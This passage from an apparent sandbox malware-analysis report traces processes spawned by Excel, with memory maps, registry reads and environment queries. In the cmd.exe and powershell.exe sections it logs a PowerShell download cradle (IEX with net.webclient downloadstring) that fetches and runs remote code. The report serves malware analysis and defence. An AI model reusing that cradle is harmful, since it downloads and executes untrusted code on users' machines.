cryptbase.dll 0x7fefd230000 0x7fefd23efff Memory Mapped File Readable, Writable, Executable False False False -
winsta.dll 0x7fefd2e0000 0x7fefd31cfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7fefd340000 0x7fefd34efff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7fefd3e0000 0x7fefd3eefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7fefd3f0000 0x7fefd429fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7fefd540000 0x7fefd575fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x7fefd580000 0x7fefd599fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7fefd5a0000 0x7fefd706fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefd710000 0x7fefd912fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7fefd970000 0x7fefd98efff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x7fefdb10000 0x7fefdce6fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7fefdda0000 0x7fefde76fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7fefe0d0000 0x7fefe1fcfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe2a0000 0x7fefe37afff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefe8f0000 0x7fefe960fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe970000 0x7feff6f7fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True False False -
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True False False -
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True False False -
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
For performance reasons, the remaining 125 entries are omitted.
The remaining entries can be found in flog.txt.
Process #3: msosync.exe
0 0
Information Value
ID #3
File Name c:\program files\microsoft office\office16\msosync.exe
Command Line "C:\Program Files\Microsoft Office\Office16\MsoSync.exe"
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:55
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x544
Parent PID 0x82c (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4D8
0x 274
0x 9B8
0x 9D8
0x 9D4
0x 9E0
0x 9F0
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0015ffff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory - True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
locale.nls 0x002c0000 0x00326fff Memory Mapped File Readable False False False -
private_0x0000000000330000 0x00330000 0x0042ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000430000 0x00430000 0x00431fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000440000 0x00440000 0x00446fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000450000 0x00450000 0x00451fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000460000 0x00460000 0x00461fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000470000 0x00470000 0x00470fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00480fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x00657fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x01beffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001bf0000 0x01bf0000 0x01ccefff Pagefile Backed Memory Readable True False False -
private_0x0000000001d50000 0x01d50000 0x01dcffff Private Memory Readable, Writable True False False -
private_0x0000000001e50000 0x01e50000 0x01e5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f40000 0x01f40000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000002030000 0x02030000 0x0212ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x0229ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000022a0000 0x022a0000 0x02692fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x026a0000 0x0296efff Memory Mapped File Readable False False False -
pagefile_0x0000000002970000 0x02970000 0x02d6ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002dc0000 0x02dc0000 0x02ebffff Private Memory Readable, Writable True False False -
private_0x0000000002f90000 0x02f90000 0x0308ffff Private Memory Readable, Writable True False False -
private_0x00000000030b0000 0x030b0000 0x031affff Private Memory Readable, Writable True False False -
private_0x0000000003b20000 0x03b20000 0x03c1ffff Private Memory Readable, Writable True False False -
private_0x00000000371e0000 0x371e0000 0x371effff Private Memory Readable, Writable, Executable True False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x775c0000 0x775c6fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
msosync.exe 0x13f8a0000 0x13f918fff Memory Mapped File Readable, Writable, Executable False False False -
msptls.dll 0x7fee6e90000 0x7fee6ffffff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x7fee8d50000 0x7fee8f72fff Memory Mapped File Readable, Writable, Executable False False False -
dwrite.dll 0x7fee9020000 0x7fee919dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x7fee91a0000 0x7fee931afff Memory Mapped File Readable, Writable, Executable False False False -
d3d10warp.dll 0x7fee9320000 0x7fee94effff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x7fee94f0000 0x7feee32efff Memory Mapped File Readable, Writable, Executable False False False -
mso99lres.dll 0x7feee330000 0x7feeec50fff Memory Mapped File Readable, Writable, Executable False False False -
mso40uires.dll 0x7feeec60000 0x7feeef67fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x7feeef70000 0x7fef024bfff Memory Mapped File Readable, Writable, Executable False False False -
mso99lwin32client.dll 0x7fef0250000 0x7fef0a1bfff Memory Mapped File Readable, Writable, Executable False False False -
mso40uiwin32client.dll 0x7fef0a20000 0x7fef130afff Memory Mapped File Readable, Writable, Executable False False False -
mso30win32client.dll 0x7fef1310000 0x7fef1787fff Memory Mapped File Readable, Writable, Executable False False False -
d3d11.dll 0x7fef2ac0000 0x7fef2b85fff Memory Mapped File Readable, Writable, Executable False False False -
mso20win32client.dll 0x7fef2b90000 0x7fef2e93fff Memory Mapped File Readable, Writable, Executable False False False -
d2d1.dll 0x7fef2fd0000 0x7fef30b1fff Memory Mapped File Readable, Writable, Executable False False False -
ospintl.dll 0x7fef7850000 0x7fef7854fff Memory Mapped File Readable, Writable, Executable False False False -
sppc.dll 0x7fef7ac0000 0x7fef7ae6fff Memory Mapped File Readable, Writable, Executable False False False -
office.odf 0x7fef8450000 0x7fef8608fff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x7fef8610000 0x7fef8925fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp140.dll 0x7fef8930000 0x7fef89cbfff Memory Mapped File Readable, Writable, Executable False False False -
gdiplus.dll 0x7fef8eb0000 0x7fef90c4fff Memory Mapped File Readable, Writable, Executable False False False -
msointl30.dll 0x7fef90d0000 0x7fef90defff Memory Mapped File Readable, Writable, Executable False False False -
msimg32.dll 0x7fef90e0000 0x7fef90e6fff Memory Mapped File Readable, Writable, Executable False False False -
davhlpr.dll 0x7fefa8d0000 0x7fefa8d9fff Memory Mapped File Readable, Writable, Executable False False False -
davclnt.dll 0x7fefa8e0000 0x7fefa8fbfff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-utility-l1-1-0.dll 0x7fefa980000 0x7fefa982fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-environment-l1-1-0.dll 0x7fefa990000 0x7fefa992fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-filesystem-l1-1-0.dll 0x7fefa9a0000 0x7fefa9a2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-time-l1-1-0.dll 0x7fefa9b0000 0x7fefa9b2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-multibyte-l1-1-0.dll 0x7fefa9c0000 0x7fefa9c4fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-math-l1-1-0.dll 0x7fefa9d0000 0x7fefa9d4fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-locale-l1-1-0.dll 0x7fefabe0000 0x7fefabe2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-convert-l1-1-0.dll 0x7fefabf0000 0x7fefabf3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x7fefaee0000 0x7fefaeeafff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-stdio-l1-1-0.dll 0x7fefb320000 0x7fefb323fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-heap-l1-1-0.dll 0x7fefb330000 0x7fefb332fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-string-l1-1-0.dll 0x7fefb340000 0x7fefb343fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7fefb350000 0x7fefb441fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-file-l1-2-0.dll 0x7fefb4c0000 0x7fefb4c2fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x7fefb5d0000 0x7fefb5e0fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-processthreads-l1-1-1.dll 0x7fefb5f0000 0x7fefb5f2fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7fefb770000 0x7fefb787fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7fefbb50000 0x7fefbba5fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x7fefbbd0000 0x7fefbbd2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-localization-l1-2-0.dll 0x7fefbbe0000 0x7fefbbe2fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-file-l2-1-0.dll 0x7fefbbf0000 0x7fefbbf2fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7fefbc00000 0x7fefbdf3fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-timezone-l1-1-0.dll 0x7fefbe00000 0x7fefbe02fff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-crt-runtime-l1-1-0.dll 0x7fefbe10000 0x7fefbe13fff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7fefbe20000 0x7fefbe35fff Memory Mapped File Readable, Writable, Executable False False False -
dxgi.dll 0x7fefbe40000 0x7fefbee6fff Memory Mapped File Readable, Writable, Executable False False False -
d3d10_1core.dll 0x7fefbef0000 0x7fefbf44fff Memory Mapped File Readable, Writable, Executable False False False -
d3d10_1.dll 0x7fefbf50000 0x7fefbf83fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7fefc280000 0x7fefc2abfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7fefc500000 0x7fefc50bfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7fefd230000 0x7fefd23efff Memory Mapped File Readable, Writable, Executable False False False -
winsta.dll 0x7fefd2e0000 0x7fefd31cfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7fefd340000 0x7fefd34efff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7fefd3e0000 0x7fefd3eefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7fefd3f0000 0x7fefd429fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7fefd540000 0x7fefd575fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x7fefd580000 0x7fefd599fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7fefd5a0000 0x7fefd706fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefd710000 0x7fefd912fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7fefd970000 0x7fefd98efff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x7fefdb10000 0x7fefdce6fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7fefdda0000 0x7fefde76fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7fefe0d0000 0x7fefe1fcfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe2a0000 0x7fefe37afff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefe8f0000 0x7fefe960fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe970000 0x7feff6f7fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory Readable, Writable True False False -
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd6fff Private Memory Readable, Writable True False False -
private_0x000007fffffd7000 0x7fffffd7000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffd9000 0x7fffffd9000 0x7fffffdafff Private Memory Readable, Writable True False False -
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdcfff Private Memory Readable, Writable True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True False False -
Process #4: cmd.exe
49 0
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"\"))
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:41
OS Process Information
Information Value
PID 0xb94
Parent PID 0x82c (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B90
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x001affff Private Memory Readable, Writable True False False -
locale.nls 0x001b0000 0x00216fff Memory Mapped File Readable False False False -
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x004cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x00657fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x01beffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001bf0000 0x01bf0000 0x01f32fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f40000 0x0220efff Memory Mapped File Readable False False False -
cmd.exe 0x4acf0000 0x4ad48fff Memory Mapped File Readable, Writable, Executable True False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
winbrand.dll 0x7fef90f0000 0x7fef90f7fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdbfff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Host Behavior
File (7)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x9e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4acf0000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x772d0000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.EXE, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x772e6d40 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x772e23d0 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x772d8290 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x772e17e0 True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:01 (UTC) True 1
Get Time type = Ticks, time = 10915093 True 1
Environment (14)
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Set Environment String name = COPYCMD True 1
Process #5: powershell.exe
598 19
Information Value
ID #5
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"\"))
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:41
OS Process Information
Information Value
PID 0x9e4
Parent PID 0xb94 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B5C
0x A10
0x A14
0x 910
0x 90C
0x BD8
0x BCC
0x BF8
0x 610
0x 5A8
0x 51C
0x BFC
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0007ffff Private Memory Readable, Writable True False False -
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x001affff Private Memory Readable, Writable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0027ffff Private Memory Readable, Writable True False False -
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x00577fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000580000 0x00580000 0x00700fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000710000 0x00710000 0x01b0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001b10000 0x01b10000 0x01c0ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x01c10000 0x01c13fff Memory Mapped File Readable True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01c20fff Pagefile Backed Memory Readable, Writable True False False -
